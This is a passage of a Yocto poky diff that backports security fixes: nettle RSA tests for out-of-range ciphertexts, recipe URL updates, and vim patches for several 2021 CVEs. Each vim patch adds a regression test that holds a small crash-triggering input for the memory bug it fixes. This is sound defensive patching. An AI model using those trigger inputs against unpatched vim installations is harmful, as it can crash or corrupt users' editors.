mpz_init_set_ui (zero, 0); ++ mpz_set_ui (bad_input, 0); + decrypted_length = msg_length; +- ASSERT(!rsa_decrypt(&key, &decrypted_length, decrypted, zero)); ++ ASSERT(!rsa_decrypt(&key, &decrypted_length, decrypted, bad_input)); + ASSERT(!rsa_decrypt_tr(&pub, &key, + &lfib, (nettle_random_func *) knuth_lfib_random, +- &decrypted_length, decrypted, zero)); ++ &decrypted_length, decrypted, bad_input)); + ASSERT(!rsa_sec_decrypt(&pub, &key, + &lfib, (nettle_random_func *) knuth_lfib_random, +- decrypted_length, decrypted, zero)); ++ decrypted_length, decrypted, bad_input)); ++ ASSERT(decrypted_length == msg_length); ++ ++ /* Test input that is slightly larger than n */ ++ mpz_add(bad_input, gibberish, pub.n); ++ decrypted_length = msg_length; ++ ASSERT(!rsa_decrypt(&key, &decrypted_length, decrypted, bad_input)); ++ ASSERT(!rsa_decrypt_tr(&pub, &key, ++ &lfib, (nettle_random_func *) knuth_lfib_random, ++ &decrypted_length, decrypted, bad_input)); ++ ASSERT(!rsa_sec_decrypt(&pub, &key, ++ &lfib, (nettle_random_func *) knuth_lfib_random, ++ decrypted_length, decrypted, bad_input)); ++ ASSERT(decrypted_length == msg_length); ++ ++ /* Test input that is considerably larger than n */ ++ mpz_mul_2exp (bad_input, pub.n, 100); ++ mpz_add (bad_input, bad_input, gibberish); ++ decrypted_length = msg_length; ++ ASSERT(!rsa_decrypt(&key, &decrypted_length, decrypted, bad_input)); ++ ASSERT(!rsa_decrypt_tr(&pub, &key, ++ &lfib, (nettle_random_func *) knuth_lfib_random, ++ &decrypted_length, decrypted, bad_input)); ++ ASSERT(!rsa_sec_decrypt(&pub, &key, ++ &lfib, (nettle_random_func *) knuth_lfib_random, ++ decrypted_length, decrypted, bad_input)); + ASSERT(decrypted_length == msg_length); + + /* Test invalid key. */ +@@ -124,6 +150,6 @@ test_main(void) + rsa_private_key_clear(&key); + rsa_public_key_clear(&pub); + mpz_clear(gibberish); +- mpz_clear(zero); ++ mpz_clear(bad_input); + free(decrypted); + } diff --git a/poky/meta/recipes-support/nettle/nettle_3.5.1.bb b/poky/meta/recipes-support/nettle/nettle_3.5.1.bb index b2ec24b36c..192fd295e9 100644 --- a/poky/meta/recipes-support/nettle/nettle_3.5.1.bb +++ b/poky/meta/recipes-support/nettle/nettle_3.5.1.bb @@ -18,6 +18,13 @@ SRC_URI = "${GNU_MIRROR}/${BPN}/${BP}.tar.gz \ file://Add-target-to-only-build-tests-not-run-them.patch \ file://run-ptest \ file://check-header-files-of-openssl-only-if-enable_.patch \ + file://CVE-2021-3580_1.patch \ + file://CVE-2021-3580_2.patch \ + file://CVE-2021-20305-1.patch \ + file://CVE-2021-20305-2.patch \ + file://CVE-2021-20305-3.patch \ + file://CVE-2021-20305-4.patch \ + file://CVE-2021-20305-5.patch \ " SRC_URI_append_class-target = "\ diff --git a/poky/meta/recipes-support/p11-kit/p11-kit_0.23.22.bb b/poky/meta/recipes-support/p11-kit/p11-kit_0.23.22.bb index 623afccb5e..5f1b73ee16 100644 --- a/poky/meta/recipes-support/p11-kit/p11-kit_0.23.22.bb +++ b/poky/meta/recipes-support/p11-kit/p11-kit_0.23.22.bb @@ -10,7 +10,7 @@ DEPENDS = "libtasn1 libtasn1-native libffi" DEPENDS_append = "${@' glib-2.0' if d.getVar('GTKDOC_ENABLED') == 'True' else ''}" -SRC_URI = "git://github.com/p11-glue/p11-kit;branch=0.23" +SRC_URI = "git://github.com/p11-glue/p11-kit;branch=0.23;protocol=https" SRCREV = "bd97afbfe28d5fbbde95ce36ff7a8834fc0291ee" S = "${WORKDIR}/git" diff --git a/poky/meta/recipes-support/ptest-runner/ptest-runner_2.4.0.bb b/poky/meta/recipes-support/ptest-runner/ptest-runner_2.4.0.bb index 7290dc90e5..3401b7b39e 100644 --- a/poky/meta/recipes-support/ptest-runner/ptest-runner_2.4.0.bb +++ b/poky/meta/recipes-support/ptest-runner/ptest-runner_2.4.0.bb @@ -10,7 +10,7 @@ LIC_FILES_CHKSUM = "file://LICENSE;md5=751419260aa954499f7abaabaa882bbe" SRCREV = "834670317bd3f6e427e1ac461c07ada6b8936dfd" PV .= "+git${SRCPV}" -SRC_URI = "git://git.yoctoproject.org/ptest-runner2 \ +SRC_URI = "git://git.yoctoproject.org/ptest-runner2;branch=master \ " UPSTREAM_VERSION_UNKNOWN = "1" diff --git a/poky/meta/recipes-support/rng-tools/rng-tools/rngd.service b/poky/meta/recipes-support/rng-tools/rng-tools/rngd.service index aaaaa29074..f296a99e1f 100644 --- a/poky/meta/recipes-support/rng-tools/rng-tools/rngd.service +++ b/poky/meta/recipes-support/rng-tools/rng-tools/rngd.service @@ -3,6 +3,7 @@ Description=Hardware RNG Entropy Gatherer Daemon DefaultDependencies=no After=systemd-udev-settle.service Before=sysinit.target shutdown.target +Wants=systemd-udev-settle.service Conflicts=shutdown.target [Service] diff --git a/poky/meta/recipes-support/rng-tools/rng-tools_6.9.bb b/poky/meta/recipes-support/rng-tools/rng-tools_6.9.bb index b8c6f022f3..58b58fbb3c 100644 --- a/poky/meta/recipes-support/rng-tools/rng-tools_6.9.bb +++ b/poky/meta/recipes-support/rng-tools/rng-tools_6.9.bb @@ -9,7 +9,7 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=b234ee4d69f5fce4486a80fdaf4a4263" DEPENDS = "sysfsutils" SRC_URI = "\ - git://github.com/nhorman/rng-tools.git \ + git://github.com/nhorman/rng-tools.git;branch=master;protocol=https \ file://0001-rngd_jitter-fix-O_NONBLOCK-setting-for-entropy-pipe.patch \ file://0002-rngd_jitter-initialize-AES-key-before-setting-the-en.patch \ file://0003-rngd_jitter-always-read-from-entropy-pipe-before-set.patch \ diff --git a/poky/meta/recipes-support/shared-mime-info/shared-mime-info_git.bb b/poky/meta/recipes-support/shared-mime-info/shared-mime-info_git.bb index 6b3ebf1cdc..05c7d32965 100644 --- a/poky/meta/recipes-support/shared-mime-info/shared-mime-info_git.bb +++ b/poky/meta/recipes-support/shared-mime-info/shared-mime-info_git.bb @@ -8,7 +8,7 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=b234ee4d69f5fce4486a80fdaf4a4263" DEPENDS = "libxml2 itstool-native glib-2.0 shared-mime-info-native" -SRC_URI = "git://gitlab.freedesktop.org/xdg/shared-mime-info.git;protocol=https" +SRC_URI = "git://gitlab.freedesktop.org/xdg/shared-mime-info.git;protocol=https;branch=master" SRCREV = "829b26d85e7d89a0caee03046c3bce373f04c80a" PV = "1.15" S = "${WORKDIR}/git" diff --git a/poky/meta/recipes-support/vim/files/0001-patch-8.2.3581-reading-character-past-end-of-line.patch b/poky/meta/recipes-support/vim/files/0001-patch-8.2.3581-reading-character-past-end-of-line.patch new file mode 100644 index 0000000000..28c61cd782 --- /dev/null +++ b/poky/meta/recipes-support/vim/files/0001-patch-8.2.3581-reading-character-past-end-of-line.patch @@ -0,0 +1,62 @@ +CVE: CVE-2021-3927 +Upstream-Status: Backport +Signed-off-by: Ross Burton + +From 93b427c6e729260d0700c3b2804ec153bc8284fa Mon Sep 17 00:00:00 2001 +From: Bram Moolenaar +Date: Thu, 4 Nov 2021 15:10:11 +0000 +Subject: [PATCH] patch 8.2.3581: reading character past end of line + +Problem: Reading character past end of line. +Solution: Correct the cursor column. +--- + src/ex_docmd.c | 1 + + src/testdir/test_put.vim | 12 ++++++++++++ + src/version.c | 2 ++ + 3 files changed, 15 insertions(+) + +diff --git a/src/ex_docmd.c b/src/ex_docmd.c +index fde726477..59e245bee 100644 +--- a/src/ex_docmd.c ++++ b/src/ex_docmd.c +@@ -6905,6 +6905,7 @@ ex_put(exarg_T *eap) + eap->forceit = TRUE; + } + curwin->w_cursor.lnum = eap->line2; ++ check_cursor_col(); + do_put(eap->regname, eap->forceit ? BACKWARD : FORWARD, 1L, + PUT_LINE|PUT_CURSLINE); + } +diff --git a/src/testdir/test_put.vim b/src/testdir/test_put.vim +index 225ebd1f3..922e5b269 100644 +--- a/src/testdir/test_put.vim ++++ b/src/testdir/test_put.vim +@@ -113,3 +113,15 @@ func Test_put_p_indent_visual() + call assert_equal('select that text', getline(2)) + bwipe! + endfunc ++ ++func Test_put_above_first_line() ++ new ++ let @" = 'text' ++ silent! normal 0o00 ++ 0put ++ call assert_equal('text', getline(1)) ++ bwipe! ++endfunc ++ ++ ++" vim: shiftwidth=2 sts=2 expandtab +diff --git a/src/version.c b/src/version.c +index a9e8be0e7..df4ec9a47 100644 +--- a/src/version.c ++++ b/src/version.c +@@ -742,6 +742,8 @@ static char *(features[]) = + + static int included_patches[] = + { /* Add new patch number below this line */ ++/**/ ++ 3581, + /**/ + 3564, + /**/ diff --git a/poky/meta/recipes-support/vim/files/0002-patch-8.2.3428-using-freed-memory-when-replacing.patch b/poky/meta/recipes-support/vim/files/0002-patch-8.2.3428-using-freed-memory-when-replacing.patch new file mode 100644 index 0000000000..ecfae0301e --- /dev/null +++ b/poky/meta/recipes-support/vim/files/0002-patch-8.2.3428-using-freed-memory-when-replacing.patch @@ -0,0 +1,83 @@ +CVE: CVE-2021-3796 +Upstream-Status: Backport +Signed-off-by: Ross Burton + +From 1160e5f74b229336502fc376416f21108d36cfc2 Mon Sep 17 00:00:00 2001 +From: Bram Moolenaar +Date: Sat, 11 Sep 2021 21:14:20 +0200 +Subject: [PATCH] patch 8.2.3428: using freed memory when replacing + +Problem: Using freed memory when replacing. (Dhiraj Mishra) +Solution: Get the line pointer after calling ins_copychar(). +--- + src/normal.c | 10 +++++++--- + src/testdir/test_edit.vim | 14 ++++++++++++++ + src/version.c | 2 ++ + 3 files changed, 23 insertions(+), 3 deletions(-) + +diff --git a/src/normal.c b/src/normal.c +index c4963e621..d6333b948 100644 +--- a/src/normal.c ++++ b/src/normal.c +@@ -5009,19 +5009,23 @@ nv_replace(cmdarg_T *cap) + { + /* + * Get ptr again, because u_save and/or showmatch() will have +- * released the line. At the same time we let know that the +- * line will be changed. ++ * released the line. This may also happen in ins_copychar(). ++ * At the same time we let know that the line will be changed. + */ +- ptr = ml_get_buf(curbuf, curwin->w_cursor.lnum, TRUE); + if (cap->nchar == Ctrl_E || cap->nchar == Ctrl_Y) + { + int c = ins_copychar(curwin->w_cursor.lnum + + (cap->nchar == Ctrl_Y ? -1 : 1)); ++ ++ ptr = ml_get_buf(curbuf, curwin->w_cursor.lnum, TRUE); + if (c != NUL) + ptr[curwin->w_cursor.col] = c; + } + else ++ { ++ ptr = ml_get_buf(curbuf, curwin->w_cursor.lnum, TRUE); + ptr[curwin->w_cursor.col] = cap->nchar; ++ } + if (p_sm && msg_silent == 0) + showmatch(cap->nchar); + ++curwin->w_cursor.col; +diff --git a/src/testdir/test_edit.vim b/src/testdir/test_edit.vim +index 4e29e7fe1..f94e6c181 100644 +--- a/src/testdir/test_edit.vim ++++ b/src/testdir/test_edit.vim +@@ -1519,3 +1519,17 @@ func Test_edit_noesckeys() + bwipe! + set esckeys + endfunc ++ ++" Test for getting the character of the line below after "p" ++func Test_edit_put_CTRL_E() ++ set encoding=latin1 ++ new ++ let @" = '' ++ sil! norm orggRx ++ sil! norm pr ++ call assert_equal(['r', 'r'], getline(1, 2)) ++ bwipe! ++ set encoding=utf-8 ++endfunc ++ ++" vim: shiftwidth=2 sts=2 expandtab +diff --git a/src/version.c b/src/version.c +index 85bdfc601..1046993d6 100644 +--- a/src/version.c ++++ b/src/version.c +@@ -742,6 +742,8 @@ static char *(features[]) = + + static int included_patches[] = + { /* Add new patch number below this line */ ++/**/ ++ 3428, + /**/ + 3409, + /**/ diff --git a/poky/meta/recipes-support/vim/files/0002-patch-8.2.3582-reading-uninitialized-memory-when-giv.patch b/poky/meta/recipes-support/vim/files/0002-patch-8.2.3582-reading-uninitialized-memory-when-giv.patch new file mode 100644 index 0000000000..d117a98893 --- /dev/null +++ b/poky/meta/recipes-support/vim/files/0002-patch-8.2.3582-reading-uninitialized-memory-when-giv.patch @@ -0,0 +1,63 @@ +CVE: CVE-2021-3928 +Upstream-Status: Backport +Signed-off-by: Ross Burton + +From ade0f0481969f1453c60e7c8354b00dfe4238739 Mon Sep 17 00:00:00 2001 +From: Bram Moolenaar +Date: Thu, 4 Nov 2021 15:46:05 +0000 +Subject: [PATCH] patch 8.2.3582: reading uninitialized memory when giving + spell suggestions + +Problem: Reading uninitialized memory when giving spell suggestions. +Solution: Check that preword is not empty. +--- + src/spellsuggest.c | 2 +- + src/testdir/test_spell.vim | 8 ++++++++ + src/version.c | 2 ++ + 3 files changed, 11 insertions(+), 1 deletion(-) + +diff --git a/src/spellsuggest.c b/src/spellsuggest.c +index 9d6df7930..8615d5280 100644 +--- a/src/spellsuggest.c ++++ b/src/spellsuggest.c +@@ -1600,7 +1600,7 @@ suggest_trie_walk( + // char, e.g., "thes," -> "these". + p = fword + sp->ts_fidx; + MB_PTR_BACK(fword, p); +- if (!spell_iswordp(p, curwin)) ++ if (!spell_iswordp(p, curwin) && *preword != NUL) + { + p = preword + STRLEN(preword); + MB_PTR_BACK(preword, p); +diff --git a/src/testdir/test_spell.vim b/src/testdir/test_spell.vim +index 79fb8927c..e435e9172 100644 +--- a/src/testdir/test_spell.vim ++++ b/src/testdir/test_spell.vim +@@ -498,6 +498,14 @@ func Test_spell_screendump() + call delete('XtestSpell') + endfunc + ++func Test_spell_single_word() ++ new ++ silent! norm 0R00 ++ spell! ß ++ silent 0norm 0r$ Dvz= ++ bwipe! ++endfunc ++ + let g:test_data_aff1 = [ + \"SET ISO8859-1", + \"TRY esianrtolcdugmphbyfvkwjkqxz-\xEB\xE9\xE8\xEA\xEF\xEE\xE4\xE0\xE2\xF6\xFC\xFB'ESIANRTOLCDUGMPHBYFVKWJKQXZ", +diff --git a/src/version.c b/src/version.c +index df4ec9a47..e1bc0d09b 100644 +--- a/src/version.c ++++ b/src/version.c +@@ -742,6 +742,8 @@ static char *(features[]) = + + static int included_patches[] = + { /* Add new patch number below this line */ ++/**/ ++ 3582, + /**/ + 3581, + /**/ diff --git a/poky/meta/recipes-support/vim/files/0002-patch-8.2.3611-crash-when-using-CTRL-W-f-without-fin.patch b/poky/meta/recipes-support/vim/files/0002-patch-8.2.3611-crash-when-using-CTRL-W-f-without-fin.patch new file mode 100644 index 0000000000..58d3442677 --- /dev/null +++ b/poky/meta/recipes-support/vim/files/0002-patch-8.2.3611-crash-when-using-CTRL-W-f-without-fin.patch @@ -0,0 +1,92 @@ +CVE: CVE-2021-3973 +Upstream-Status: Backport +Signed-off-by: Ross Burton + +From b6154e9f530544ddc3130d981caae0dabc053757 Mon Sep 17 00:00:00 2001 +From: Bram Moolenaar +Date: Wed, 17 Nov 2021 18:00:31 +0000 +Subject: [PATCH] patch 8.2.3611: crash when using CTRL-W f without finding a + file name Problem: Crash when using CTRL-W f without finding + a file name. Solution: Bail out when the file name length is zero. + +--- + src/findfile.c | 8 ++++++++ + src/normal.c | 6 ++++-- + src/testdir/test_visual.vim | 8 ++++++++ + src/version.c | 2 ++ + 4 files changed, 22 insertions(+), 2 deletions(-) + +diff --git a/src/findfile.c b/src/findfile.c +index dba547da1..5764fd7b8 100644 +--- a/src/findfile.c ++++ b/src/findfile.c +@@ -1727,6 +1727,9 @@ find_file_in_path_option( + proc->pr_WindowPtr = (APTR)-1L; + # endif + ++ if (len == 0) ++ return NULL; ++ + if (first == TRUE) + { + // copy file name into NameBuff, expanding environment variables +@@ -2094,7 +2097,12 @@ find_file_name_in_path( + int c; + # if defined(FEAT_FIND_ID) && defined(FEAT_EVAL) + char_u *tofree = NULL; ++# endif + ++ if (len == 0) ++ return NULL; ++ ++# if defined(FEAT_FIND_ID) && defined(FEAT_EVAL) + if ((options & FNAME_INCL) && *curbuf->b_p_inex != NUL) + { + tofree = eval_includeexpr(ptr, len); +diff --git a/src/normal.c b/src/normal.c +index 7cb959257..f0084f2ac 100644 +--- a/src/normal.c ++++ b/src/normal.c +@@ -3778,8 +3778,10 @@ get_visual_text( + *pp = ml_get_pos(&VIsual); + *lenp = curwin->w_cursor.col - VIsual.col + 1; + } +- if (has_mbyte) +- // Correct the length to include the whole last character. ++ if (**pp == NUL) ++ *lenp = 0; ++ if (has_mbyte && *lenp > 0) ++ // Correct the length to include all bytes of the last character. + *lenp += (*mb_ptr2len)(*pp + (*lenp - 1)) - 1; + } + reset_VIsual_and_resel(); +diff --git a/src/testdir/test_visual.vim b/src/testdir/test_visual.vim +index ae281238e..0705fdb57 100644 +--- a/src/testdir/test_visual.vim ++++ b/src/testdir/test_visual.vim +@@ -894,4 +894,12 @@ func Test_block_insert_replace_tabs() + bwipe! + endfunc + ++func Test_visual_block_ctrl_w_f() ++ " Emtpy block selected in new buffer should not result in an error. ++ au! BufNew foo sil norm f ++ edit foo ++ ++ au! BufNew ++endfunc ++ + " vim: shiftwidth=2 sts=2 expandtab +diff --git a/src/version.c b/src/version.c +index 52be3c39d..59a314b3a 100644 +--- a/src/version.c ++++ b/src/version.c +@@ -742,6 +742,8 @@ static char *(features[]) = + + static int included_patches[] = + { /* Add new patch number below this line */ ++/**/ ++ 3611, + /**/ + 3582, + /**/ diff --git a/poky/meta/recipes-support/vim/files/0003-patch-8.2.3487-illegal-memory-access-if-buffer-name-.patch b/poky/meta/recipes-support/vim/files/0003-patch-8.2.3487-illegal-memory-access-if-buffer-name-.patch new file mode 100644 index 0000000000..576664f436 --- /dev/null +++ b/poky/meta/recipes-support/vim/files/0003-patch-8.2.3487-illegal-memory-access-if-buffer-name-.patch @@ -0,0 +1,86 @@ +CVE: CVE-2021-3872 +Upstream-Status: Backport +Signed-off-by: Ross Burton + +From 61629ea24a2fff1f89c37479d3fb52f17c3480fc Mon Sep 17 00:00:00 2001 +From: Bram Moolenaar +Date: Fri, 8 Oct 2021 18:39:28 +0100 +Subject: [PATCH] patch 8.2.3487: illegal memory access if buffer name is very + long + +Problem: Illegal memory access if buffer name is very long. +Solution: Make sure not to go over the end of the buffer. +--- + src/drawscreen.c | 10 +++++----- + src/testdir/test_statusline.vim | 11 +++++++++++ + src/version.c | 2 ++ + 3 files changed, 18 insertions(+), 5 deletions(-) + +diff --git a/src/drawscreen.c b/src/drawscreen.c +index 3a88ee979..9acb70552 100644 +--- a/src/drawscreen.c ++++ b/src/drawscreen.c +@@ -446,13 +446,13 @@ win_redr_status(win_T *wp, int ignore_pum UNUSED) + *(p + len++) = ' '; + if (bt_help(wp->w_buffer)) + { +- STRCPY(p + len, _("[Help]")); ++ vim_snprintf((char *)p + len, MAXPATHL - len, "%s", _("[Help]")); + len += (int)STRLEN(p + len); + } + #ifdef FEAT_QUICKFIX + if (wp->w_p_pvw) + { +- STRCPY(p + len, _("[Preview]")); ++ vim_snprintf((char *)p + len, MAXPATHL - len, "%s", _("[Preview]")); + len += (int)STRLEN(p + len); + } + #endif +@@ -462,12 +462,12 @@ win_redr_status(win_T *wp, int ignore_pum UNUSED) + #endif + ) + { +- STRCPY(p + len, "[+]"); +- len += 3; ++ vim_snprintf((char *)p + len, MAXPATHL - len, "%s", "[+]"); ++ len += (int)STRLEN(p + len); + } + if (wp->w_buffer->b_p_ro) + { +- STRCPY(p + len, _("[RO]")); ++ vim_snprintf((char *)p + len, MAXPATHL - len, "%s", _("[RO]")); + len += (int)STRLEN(p + len); + } + +diff --git a/src/testdir/test_statusline.vim b/src/testdir/test_statusline.vim +index 1f705b847..91bce1407 100644 +--- a/src/testdir/test_statusline.vim ++++ b/src/testdir/test_statusline.vim +@@ -393,3 +393,14 @@ func Test_statusline_visual() + bwipe! x1 + bwipe! x2 + endfunc ++" Used to write beyond allocated memory. This assumes MAXPATHL is 4096 bytes. ++func Test_statusline_verylong_filename() ++ let fname = repeat('x', 4090) ++ exe "new " .. fname ++ set buftype=help ++ set previewwindow ++ redraw ++ bwipe! ++endfunc ++ ++" vim: shiftwidth=2 sts=2 expandtab +diff --git a/src/version.c b/src/version.c +index 1046993d6..2b5de5ccf 100644 +--- a/src/version.c ++++ b/src/version.c +@@ -742,6 +742,8 @@ static char *(features[]) = + + static int included_patches[] = + { /* Add new patch number below this line */ ++/**/ ++ 3487, + /**/ + 3428, + /**/ diff --git a/poky/meta/recipes-support/vim/files/0004-patch-8.2.3489-ml_get-error-after-search-with-range.patch b/poky/meta/recipes-support/vim/files/0004-patch-8.2.3489-ml_get-error-after-search-with-range.patch new file mode 100644 index 0000000000..045081579c --- /dev/null +++ b/poky/meta/recipes-support/vim/files/0004-patch-8.2.3489-ml_get-error-after-search-with-range.patch @@ -0,0 +1,72 @@ +CVE: CVE-2021-3875 +Upstream-Status: Backport +Signed-off-by: Ross Burton + +From b8968e26d7508e7d64bfc86808142818b0a9288c Mon Sep 17 00:00:00 2001 +From: Bram Moolenaar +Date: Sat, 9 Oct 2021 13:58:55 +0100 +Subject: [PATCH] patch 8.2.3489: ml_get error after search with range + +Problem: ml_get error after search with range. +Solution: Limit the line number to the buffer line count. +--- + src/ex_docmd.c | 6 ++++-- + src/testdir/test_search.vim | 17 +++++++++++++++++ + src/version.c | 2 ++ + 3 files changed, 23 insertions(+), 2 deletions(-) + +diff --git a/src/ex_docmd.c b/src/ex_docmd.c +index fb07450f8..fde726477 100644 +--- a/src/ex_docmd.c ++++ b/src/ex_docmd.c +@@ -3586,8 +3586,10 @@ get_address( + + // When '/' or '?' follows another address, start from + // there. +- if (lnum != MAXLNUM) +- curwin->w_cursor.lnum = lnum; ++ if (lnum > 0 && lnum != MAXLNUM) ++ curwin->w_cursor.lnum = ++ lnum > curbuf->b_ml.ml_line_count ++ ? curbuf->b_ml.ml_line_count : lnum; + + // Start a forward search at the end of the line (unless + // before the first line). +diff --git a/src/testdir/test_search.vim b/src/testdir/test_search.vim +index 187671305..e142c3547 100644 +--- a/src/testdir/test_search.vim ++++ b/src/testdir/test_search.vim +@@ -1366,3 +1366,20 @@ func Test_searchdecl() + + bwipe! + endfunc ++ ++func Test_search_with_invalid_range() ++ new ++ let lines =<< trim END ++ /\%.v ++ 5/ ++ c ++ END ++ call writefile(lines, 'Xrangesearch') ++ source Xrangesearch ++ ++ bwipe! ++ call delete('Xrangesearch') ++endfunc ++ ++ ++" vim: shiftwidth=2 sts=2 expandtab +diff --git a/src/version.c b/src/version.c +index 2b5de5ccf..092864bbb 100644 +--- a/src/version.c ++++ b/src/version.c +@@ -742,6 +742,8 @@ static char *(features[]) = + + static int included_patches[] = + { /* Add new patch number below this line */ ++/**/ ++ 3489, + /**/ + 3487, + /**/ diff --git a/poky/meta/recipes-support/vim/files/0005-patch-8.2.3564-invalid-memory-access-when-scrolling-.patch b/poky/meta/recipes-support/vim/files/0005-patch-8.2.3564-invalid-memory-access-when-scrolling-.patch new file mode 100644 index 0000000000..7184b37cad --- /dev/null +++ b/poky/meta/recipes-support/vim/files/0005-patch-8.2.3564-invalid-memory-access-when-scrolling-.patch @@ -0,0 +1,97 @@ +CVE: CVE-2021-3903 +Upstream-Status: Backport +Signed-off-by: Ross Burton + +From b15919c1fe0f7fc3d98ff5207ed2feb43c59009d Mon Sep 17 00:00:00 2001 +From: Bram Moolenaar +Date: Mon, 25 Oct 2021 17:07:04 +0100 +Subject: [PATCH] patch 8.2.3564: invalid memory access when scrolling without + valid screen + +Problem: Invalid memory access when scrolling without a valid screen. +Solution: Do not set VALID_BOTLINE in w_valid. +--- + src/move.c | 1 - + src/testdir/test_normal.vim | 23 ++++++++++++++++++++--- + src/version.c | 2 ++ + 3 files changed, 22 insertions(+), 4 deletions(-) + +diff --git a/src/move.c b/src/move.c +index 8e53d8bcb..10165ef4d 100644 +--- a/src/move.c ++++ b/src/move.c +@@ -198,7 +198,6 @@ update_topline(void) + { + curwin->w_topline = curwin->w_cursor.lnum; + curwin->w_botline = curwin->w_topline; +- curwin->w_valid |= VALID_BOTLINE|VALID_BOTLINE_AP; + curwin->w_scbind_pos = 1; + return; + } +diff --git a/src/testdir/test_normal.vim b/src/testdir/test_normal.vim +index d45cf4159..ca87928f5 100644 +--- a/src/testdir/test_normal.vim ++++ b/src/testdir/test_normal.vim +@@ -33,14 +33,14 @@ func CountSpaces(type, ...) + else + silent exe "normal! `[v`]y" + endif +- let g:a=strlen(substitute(@@, '[^ ]', '', 'g')) ++ let g:a = strlen(substitute(@@, '[^ ]', '', 'g')) + let &selection = sel_save + let @@ = reg_save + endfunc + + func OpfuncDummy(type, ...) + " for testing operatorfunc +- let g:opt=&linebreak ++ let g:opt = &linebreak + + if a:0 " Invoked from Visual mode, use gv command. + silent exe "normal! gvy" +@@ -51,7 +51,7 @@ func OpfuncDummy(type, ...) + endif + " Create a new dummy window + new +- let g:bufnr=bufnr('%') ++ let g:bufnr = bufnr('%') + endfunc + + fun! Test_normal00_optrans() +@@ -718,6 +718,23 @@ func Test_normal17_z_scroll_hor2() + bw! + endfunc + ++ ++func Test_scroll_in_ex_mode() ++ " This was using invalid memory because w_botline was invalid. ++ let lines =<< trim END ++ diffsplit ++ norm os00( ++ call writefile(['done'], 'Xdone') ++ qa! ++ END ++ call writefile(lines, 'Xscript') ++ call assert_equal(1, RunVim([], [], '--clean -X -Z -e -s -S Xscript')) ++ call assert_equal(['done'], readfile('Xdone')) ++ ++ call delete('Xscript') ++ call delete('Xdone') ++endfunc ++ + func Test_normal18_z_fold() + " basic tests for foldopen/folddelete + if !has("folding") +diff --git a/src/version.c b/src/version.c +index 092864bbb..a9e8be0e7 100644 +--- a/src/version.c ++++ b/src/version.c +@@ -742,6 +742,8 @@ static char *(features[]) = + + static int included_patches[] = + { /* Add new patch number below this line */ ++/**/ ++ 3564, + /**/ + 3489, + /**/ diff --git a/poky/meta/recipes-support/vim/files/CVE-2021-3778.patch b/poky/meta/recipes-support/vim/files/CVE-2021-3778.patch new file mode 100644 index 0000000000..5fa60f5340 --- /dev/null +++ b/poky/meta/recipes-support/vim/files/CVE-2021-3778.patch @@ -0,0 +1,61 @@ +From 6d351cec5b97cb72b226d03bd727e453a235ed8d Mon Sep 17 00:00:00 2001 +From: Minjae Kim +Date: Sun, 26 Sep 2021 23:48:00 +0000 +Subject: [PATCH] patch 8.2.3409: reading beyond end of line with invalid utf-8 + character + +Problem: Reading beyond end of line with invalid utf-8 character. +Solution: Check for NUL when advancing. + +Upstream-Status: Accepted [https://github.com/vim/vim/commit/65b605665997fad54ef39a93199e305af2fe4d7f] +CVE: CVE-2021-3778 +Signed-off-by: Minjae Kim + +--- + src/regexp_nfa.c | 3 ++- + src/testdir/test_regexp_utf8.vim | 7 +++++++ + src/version.c | 2 ++ + 3 files changed, 11 insertions(+), 1 deletion(-) + +diff --git a/src/regexp_nfa.c b/src/regexp_nfa.c +index fb512f961..ace83a1a3 100644 +--- a/src/regexp_nfa.c ++++ b/src/regexp_nfa.c +@@ -5455,7 +5455,8 @@ find_match_text(colnr_T startcol, int regstart, char_u *match_text) + match = FALSE; + break; + } +- len2 += MB_CHAR2LEN(c2); ++ len2 += enc_utf8 ? utf_ptr2len(rex.line + col + len2) ++ : MB_CHAR2LEN(c2); + } + if (match + // check that no composing char follows +diff --git a/src/testdir/test_regexp_utf8.vim b/src/testdir/test_regexp_utf8.vim +index 19ff882be..e0665818b 100644 +--- a/src/testdir/test_regexp_utf8.vim ++++ b/src/testdir/test_regexp_utf8.vim +@@ -215,3 +215,10 @@ func Test_optmatch_toolong() + set re=0 + endfunc + ++func Test_match_invalid_byte() ++ call writefile(0z630a.765d30aa0a.2e0a.790a.4030, 'Xinvalid') ++ new ++ source Xinvalid ++ bwipe! ++ call delete('Xinvalid') ++endfunc +diff --git a/src/version.c b/src/version.c +index 8912f6215..85bdfc601 100644 +--- a/src/version.c ++++ b/src/version.c +@@ -742,6 +742,8 @@ static char *(features[]) = + + static int included_patches[] = + { /* Add new patch number below this line */ ++/**/ ++ 3409, + /**/ + 3402, + /**/ diff --git a/poky/meta/recipes-support/vim/files/CVE-2021-4069.patch b/poky/meta/recipes-support/vim/files/CVE-2021-4069.patch new file mode 100644 index 0000000000..6a67281907 --- /dev/null +++ b/poky/meta/recipes-support/vim/files/CVE-2021-4069.patch @@ -0,0 +1,43 @@ +From cd2422ee2dab3f33b2dbd1271e17cdaf8762b6d1 Mon Sep 17 00:00:00 2001 +From: Minjae Kim +Date: Fri, 17 Dec 2021 20:32:02 -0800 +Subject: [PATCH] using freed memory in open command + +Problem: Using freed memory in open command. +Solution: Make a copy of the current line. + +Upstream-Status: Backported [https://github.com/vim/vim/commit/e031fe90cf2e375ce861ff5e5e281e4ad229ebb9] +CVE: CVE-2021-4069 +Signed-off-by: Minjae Kim +--- + src/ex_docmd.c | 10 +++++++--- + 1 file changed, 7 insertions(+), 3 deletions(-) + +diff --git a/src/ex_docmd.c b/src/ex_docmd.c +index 59e245bee..ccd9e8bed 100644 +--- a/src/ex_docmd.c ++++ b/src/ex_docmd.c +@@ -6029,13 +6029,17 @@ ex_open(exarg_T *eap) + regmatch.regprog = vim_regcomp(eap->arg, p_magic ? RE_MAGIC : 0); + if (regmatch.regprog != NULL) + { ++ // make a copy of the line, when searching for a mark it might be ++ // flushed ++ char_u *line = vim_strsave(ml_get_curline()); ++ + regmatch.rm_ic = p_ic; +- p = ml_get_curline(); +- if (vim_regexec(®match, p, (colnr_T)0)) +- curwin->w_cursor.col = (colnr_T)(regmatch.startp[0] - p); ++ if (vim_regexec(®match, line, (colnr_T)0)) ++ curwin->w_cursor.col = (colnr_T)(regmatch.startp[0] - line); + else + emsg(_(e_nomatch)); + vim_regfree(regmatch.regprog); ++ vim_free(line); + } + // Move to the NUL, ignore any other arguments. + eap->arg += STRLEN(eap->arg); +-- +2.25.1 + diff --git a/poky/meta/recipes-support/vim/files/b7081e135a16091c93f6f5f7525a5c58fb7ca9f9.patch 